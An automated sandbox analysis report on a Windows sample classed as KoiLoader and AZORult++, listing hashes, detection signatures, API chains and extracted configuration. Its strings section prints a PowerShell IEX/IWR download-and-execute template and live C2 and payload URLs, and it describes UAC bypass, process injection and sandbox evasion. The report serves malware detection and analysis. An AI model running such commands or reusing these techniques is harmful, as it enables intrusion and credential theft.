Windows Analysis Report
JT1yqn67un.exe

Overview

General Information

Sample name: JT1yqn67un.exe
renamed because original name is a hash value
Original sample name: 9e88e85a46486f7f56b3aaba6e29737c.exe
Analysis ID: 1528834
MD5: 9e88e85a46486f7f56b3aaba6e29737c
SHA1: c33d28a63c240f4677b185e7cbc918da3d4f49ec
SHA256: deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
Tags: exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: JT1yqn67un.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: KoiLoader {"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}
Multi AV Scanner detection for submitted file
Source: JT1yqn67un.exe ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe Virustotal: Detection: 58% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: JT1yqn67un.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_005E8710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E93B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_005E93B0

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize, 0_2_005E72E0
Uses 32bit PE files
Source: JT1yqn67un.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: JT1yqn67un.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://2.58.14.95/malto.php
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6410 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,closesocket,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree, 0_2_005E6410
Source: JT1yqn67un.exe String found in binary or memory: http://2.58.14.95/malto.php
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: http://2.58.14.95/malto.php%temp%
Source: JT1yqn67un.exe String found in binary or memory: https://lacasadelverde.com/css
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: https://lacasadelverde.com/css/c

E-Banking Fraud
barindex
Detected AZORult++ Trojan
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E9250 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_005E9250

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005E5C60
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_005E5FD0
Detected potential crypto function
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0FBC1 0_2_00F0FBC1
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 0_2_005E89F0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7C30 0_2_005E7C30
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E26A0 0_2_005E26A0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7710 0_2_005E7710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E43D0 0_2_005E43D0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E47D0 0_2_005E47D0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: String function: 00F050E0 appears 33 times
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: String function: 00F03CE0 appears 82 times
Uses 32bit PE files
Source: JT1yqn67un.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_005E6370
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString, 0_2_005E6C60
Source: JT1yqn67un.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JT1yqn67un.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: JT1yqn67un.exe ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe Virustotal: Detection: 58%
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: uxtheme.dll Jump to behavior
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: JT1yqn67un.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Yara detected KoiLoader
Source: Yara match File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00F01300
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F102D1 push ecx; ret 0_2_00F102E4

Malware Analysis System Evasion
barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_005E89F0
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\JT1yqn67un.exe File opened / queried: C:\Windows\System32\VBoxService.exe Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\JT1yqn67un.exe API coverage: 9.8 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
Source: JT1yqn67un.exe Binary or memory string: Hyper-V
Source: JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp Binary or memory string: POST%s|%s|hhlT6dDnStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://2.58.14.95/malto.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://lacasadelverde.com/css/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: JT1yqn67un.exe Binary or memory string: VMWare
Source: JT1yqn67un.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: JT1yqn67un.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\JT1yqn67un.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JT1yqn67un.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F076CB
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00F01300
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01710 mov ecx, dword ptr fs:[00000030h] 0_2_00F01710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7920 mov eax, dword ptr fs:[00000030h] 0_2_005E7920
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5FD0 mov eax, dword ptr fs:[00000030h] 0_2_005E5FD0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0B779 GetProcessHeap, 0_2_00F0B779
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F05016 SetUnhandledExceptionFilter, 0_2_00F05016
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F049BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F049BE
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F076CB
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F04E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F04E89

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005E5C60
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe 0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_005E94B0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F05125 cpuid 0_2_00F05125
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F04D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F04D70
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528834 Sample: JT1yqn67un.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 8 Found malware configuration 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 6 other signatures 2->14 5 JT1yqn67un.exe 2->5         started        process3 signatures4 16 Contains functionality to bypass UAC (CMSTPLUA) 5->16 18 Detected AZORult++ Trojan 5->18 20 Found evasive API chain (may stop execution after checking mutex) 5->20 22 4 other signatures 5->22
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://2.58.14.95/malto.php true unknown